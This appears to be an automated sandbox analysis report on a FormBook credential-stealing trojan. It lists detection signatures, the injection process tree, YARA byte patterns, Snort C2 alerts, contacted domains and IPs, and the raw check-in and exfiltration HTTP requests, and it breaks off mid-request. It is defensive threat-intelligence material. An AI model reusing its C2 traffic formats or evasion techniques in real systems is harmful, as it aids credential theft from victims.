
Windows Analysis Report
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Analysis ID: 830750
MD5: c7714b273571ba64c0b77afca236ac6d
SHA1: c24d9460bee8a724abe8b0dcf3d74851dd5737ed
SHA256: e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe (PID: 5020 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe MD5: C7714B273571BA64C0B77AFCA236AC6D)
    • vfpbkeeo.exe (PID: 1316 cmdline: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m MD5: 6D30D26416D626447BA4298A59111F6D)
      • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • vfpbkeeo.exe (PID: 1948 cmdline: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe MD5: 6D30D26416D626447BA4298A59111F6D)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmd.exe (PID: 916 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source | Rule | Description | Author | Strings
3.2.vfpbkeeo.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.vfpbkeeo.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x20103:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1931a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.vfpbkeeo.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x19118:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x18bb4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1921a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x19392:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x17dff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1eeaa:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1fe5d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.vfpbkeeo.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.vfpbkeeo.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x20f03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1a11a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
No Sigma rule has matched
Timestamp | Source IP:Port | Destination IP:Port | Protocol | SID | Classtype
03/20/23-17:00:09.343542 | 192.168.2.4:49702 | 91.195.240.94:80 | TCP | 2031449 | A Network Trojan was detected
03/20/23-17:00:25.955923 | 192.168.2.4:49706 | 81.17.18.198:80 | TCP | 2031412 | A Network Trojan was detected
03/20/23-17:00:25.955923 | 192.168.2.4:49706 | 81.17.18.198:80 | TCP | 2031453 | A Network Trojan was detected
03/20/23-16:59:46.201874 | 192.168.2.4:49696 | 94.176.104.86:80 | TCP | 2031453 | A Network Trojan was detected
03/20/23-17:00:09.343542 | 192.168.2.4:49702 | 91.195.240.94:80 | TCP | 2031453 | A Network Trojan was detected
03/20/23-16:59:46.201874 | 192.168.2.4:49696 | 94.176.104.86:80 | TCP | 2031412 | A Network Trojan was detected
03/20/23-17:00:09.343542 | 192.168.2.4:49702 | 91.195.240.94:80 | TCP | 2031412 | A Network Trojan was detected
03/20/23-16:59:46.201874 | 192.168.2.4:49696 | 94.176.104.86:80 | TCP | 2031449 | A Network Trojan was detected
03/20/23-17:00:25.955923 | 192.168.2.4:49706 | 81.17.18.198:80 | TCP | 2031449 | A Network Trojan was detected


AV Detection

Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | ReversingLabs: Detection: 42%
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Virustotal: Detection: 42%
Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | ReversingLabs: Detection: 38%
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Joe Sandbox ML: detected
Source: 3.2.vfpbkeeo.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.vfpbkeeo.exe.2080000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP | source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP | source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb | source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Code function: 0_2_00405D74 CloseHandle, GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Code function: 0_2_0040699E FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe | Code function: 0_2_0040290B FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe | Code function: 1_2_004089B8 FindFirstFileExW

Networking

Source: C:\Windows\explorer.exe | Network Connect: 85.187.128.34 80
Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe | Network Connect: 45.33.30.197 80
Source: C:\Windows\explorer.exe | Domain query: www.un-object.com
Source: C:\Windows\explorer.exe | Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe | Network Connect: 78.141.192.145 80
Source: C:\Windows\explorer.exe | Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe | Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe | Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe | Network Connect: 81.17.18.198 80
Source: C:\Windows\explorer.exe | Network Connect: 192.185.17.12 80
Source: C:\Windows\explorer.exe | Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe | Network Connect: 199.192.30.147 80
Source: C:\Windows\explorer.exe | Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe | Domain query: www.younrock.com
Source: C:\Windows\explorer.exe | Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe | Network Connect: 161.97.163.8 80
Source: C:\Windows\explorer.exe | Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe | Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe | Network Connect: 94.176.104.86 80
Source: C:\Windows\explorer.exe | Network Connect: 213.145.228.111 80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: C:\Windows\explorer.exe | DNS query: www.shapshit.xyz
Source: Joe Sandbox View | ASN Name: A2HOSTINGUS A2HOSTINGUS
Source: Joe Sandbox View | ASN Name: SEDO-ASDE SEDO-ASDE
Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1 | Host: www.white-hat.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1 | Host: www.gritslab.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1 | Host: www.bitservicesltd.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1 | Host: www.222ambking.org | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1 | Host: www.energyservicestation.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1 | Host: www.younrock.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1 | Host: www.thewildphotographer.co.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1 | Host: www.shapshit.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1 | Host: www.thedivinerudraksha.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1 | Host: www.un-object.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 85.187.128.34 85.187.128.34
Source: Joe Sandbox View | IP Address: 91.195.240.94 91.195.240.94
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 35 5a 35 7a 4c 65 5a 50 61 4c 66 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR75Z5zLeZPaLfvbt5YRg).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 7e 45 72 71 76 43 53 5f 30 5a 37 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMI~ErqvCS_0Z7gPOgw6Q).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.energyservicestation.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.energyservicestation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyservicestation.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 50 46 49 30 53 72 65 66 77 55 32 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tPFI0SrefwU2dntdDjQ).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.younrock.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.younrock.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.younrock.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 67 69 47 48 57 42 58 35 6a 6a 42 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMgiGHWBX5jjBgRqvHVA).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.thewildphotographer.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thewildphotographer.co.uk/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 